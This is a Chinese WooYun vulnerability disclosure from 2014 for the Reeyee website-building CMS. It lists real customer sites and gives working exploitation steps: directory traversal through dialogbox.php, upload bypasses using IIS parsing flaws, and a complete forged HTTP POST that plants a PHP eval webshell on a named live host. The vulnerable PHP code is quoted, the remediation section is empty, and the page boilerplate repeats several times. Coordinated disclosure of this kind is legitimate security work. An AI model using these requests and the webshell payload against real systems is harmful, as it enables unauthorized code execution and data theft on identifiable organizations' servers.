锐意先行网站建设系统遍历文件漏洞+三招Getshell+波及奇瑞、人保等大量高端客户

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-059045

漏洞标题：锐意先行网站建设系统遍历文件漏洞+三招Getshell+波及奇瑞、人保等大量高端客户

漏洞作者：夕风号

提交时间：2014-05-01 10:21

修复时间：2014-07-30 10:22

公开时间：2014-07-30 10:22

漏洞类型：文件上传导致任意代码执行

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-05-01：细节已通知厂商并且等待厂商处理中
2014-05-06：厂商已经确认，细节仅向厂商公开
2014-05-09：细节向第三方安全合作伙伴开放
2014-06-30：细节向核心白帽子及相关领域专家公开
2014-07-10：细节向普通白帽子公开
2014-07-20：细节向实习白帽子公开
2014-07-30：细节向公众公开

简要描述：

Fyi:
1.http://www.reeyee.cn/case/
2.http://www.reeyee.net/brand.html

详细说明：

1.案例
[官方]
http://www.reeyee.com
http://www.reeyee.cn
http://www.reeyee.net
[客户]
http://www.cheryacteco.com
http://www.cheryplus.com
http://www.picc-js.com
http://www.bqls.net
http://www.tx-hoto.com
其它客户可搜索“Powered by reeyee”或于http://www.reeyee.cn/case/中查看。
2.文件遍历
访问/admin/inc/dialogbox.php?pDir=&curr_dir=&type=0&filetypes=&form=frmList&formname=brief_img即可，将pDir改为形如../../格式可实现目录回溯，比如，
http://www.cheryplus.com/admin/inc/dialogbox.php?pDir=&curr_dir=../../../&type=0&filetypes=&form=frmList&formname=brief_img
有时可泄露敏感文件。
3.Getshell
0x01
当服务器为IIS 6.0时，访问/admin/inc/wnews.php?type=1&path=video&form=frmList&formname=img，上传*.php;.jpg格式webshell即可，比如，
http://202.119.148.83/admin/inc/wnews.php?type=1&path=video&form=frmList&formname=img
然后后于页面源代码中查看webshell路径。
0x02
当服务器为IIS 6.0或IIS 7.5时，访问/admin/inc/wnews.php?type=1&path=video.php&form=frmList&formname=img，有时需绕过客户端Javascript验证（略），上传*.jpg格式webshell即可，比如，
http://www.wiiboox.cn/admin/inc/wnews.php?type=1&path=video.php&form=frmList&formname=img
然后后于页面源代码中查看webshell路径。

0x03
终极解法
以http://www.tx-hoto.com为例，向目标/admin/inc/wnewssave.php发起如下HTTP请求，注意Cookie值及filename值：
POST http://www.tx-hoto.com/admin/inc/wnewssave.php?formname=src&form=frmList

Host: www.tx-hoto.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:28.0) Gecko/20100101 Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.tx-hoto.com/admin/inc/wnews.php?type=1&path=user_download&form=frmList&formname=src
Cookie: user_download_src_UPLOAD=php%2Cxls%2Cppt%2Cpdf%2Cdoc%2Cdocx%7C20000000%7C0%7C1%7C1
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------29809125845679
Content-Length: 636
-----------------------------29809125845679\r\n
Content-Disposition: form-data; name="filepath"\r\n
\r\n
user_download\r\n
-----------------------------29809125845679\r\n
Content-Disposition: form-data; name="type"\r\n
\r\n
1\r\n
-----------------------------29809125845679\r\n
Content-Disposition: form-data; name="src"; filename="test.php"\r\n
Content-Type: application/msword\r\n
\r\n
<?php @eval($_POST['savep']);?>\r\n
-----------------------------29809125845679\r\n
Content-Disposition: form-data; name="Submit"\r\n
\r\n
Â· æ\x8f\x90äº¤ Â·\r\n
-----------------------------29809125845679\r\n
Content-Disposition: form-data; name="proimg"\r\n
\r\n
\r\n
-----------------------------29809125845679--\r\n

漏洞证明：

来，看代码！
/admin/inc/wnewssave.php

$para	= array("TYPE"		=> "gif,jpg,jpeg",
					"SIZE"		=> $upload_max_filesize,
					"EXISTS"	=> 0,
					"RENAME"	=> 0,
					"ERROR"		=>1,
					"RESIZE"	=>"");
	if (isset($_COOKIE["{$_POST['filepath']}_{$_GET['formname']}_UPLOAD"])) 
	{
		$coo = $_COOKIE["{$_POST['filepath']}_{$_GET['formname']}_UPLOAD"];
		$tmp	= explode("|",$coo);
		$para['TYPE'] = $tmp[0];
    	$para['SIZE'] = $tmp[1];
    	$para['EXISTS'] = $tmp[2];
    	$para['RENAME'] = $tmp[3];
    	$para['ERROR'] = $tmp[4];
    	if(isset($tmp[5])) $para['RESIZE'] = $tmp[4];
	}
	elseif (isset($_COOKIE["{$_POST['filepath']}_UPLOAD"])) 
	{
		$coo = $_COOKIE["{$_POST['filepath']}_UPLOAD"];
		$tmp	= explode("|",$coo);
		$para['TYPE'] = $tmp[0];
    	$para['SIZE'] = $tmp[1];
    	$para['EXISTS'] = $tmp[2];
    	$para['RENAME'] = $tmp[3];
    	$para['ERROR'] = $tmp[4];
    	if(isset($tmp[5])) $para['RESIZE'] = $tmp[4];
	}
	$u->UPLOAD_FILE_TYPE 				= $para['TYPE'];
	$u->UPLOAD_FILE_MAX_SIZE 			= $para['SIZE']>$upload_max_filesize?$upload_max_filesize:$para['SIZE'];
	$u->UPLOAD_FILE_CHECK_FILE_EXISTS	= $para['EXISTS'];
	$u->UPLOAD_FILE_AUTO_RENAME			= $para['RENAME'];
	$u->UPLOAD_FILE_ERROR_TYPE			= $para['ERROR'];

修复方案：

You know it.

版权声明：转载请注明来源夕风号@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：19

确认时间：2014-05-06 08:45

厂商回复：

CNVD确认并在实例上复现所述多个漏洞情况，对于涉及的重要信息系统部门案例，已经转由CNCERT下发给江苏分中心协调处置。CNVD并将通过公开联系渠道联系软件生产厂商处置。

漏洞评价：

2014-08-19 10:40 | 革命往事 ( 路人 | Rank:17 漏洞数:2 | 革命已成往事)

你这么屌你家人知道么

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-059045

漏洞标题：锐意先行网站建设系统遍历文件漏洞+三招Getshell+波及奇瑞、人保等大量高端客户

相关厂商：锐意先行

漏洞作者：夕风号

提交时间：2014-05-01 10:21

修复时间：2014-07-30 10:22

公开时间：2014-07-30 10:22

漏洞类型：文件上传导致任意代码执行

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源夕风号@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-059045

漏洞标题：锐意先行网站建设系统遍历文件漏洞+三招Getshell+波及奇瑞、人保等大量高端客户

相关厂商：锐意先行

漏洞作者： 夕风号

提交时间：2014-05-01 10:21

修复时间：2014-07-30 10:22

公开时间：2014-07-30 10:22

漏洞类型：文件上传导致任意代码执行

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-059045"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 夕风号@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：夕风号

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源夕风号@乌云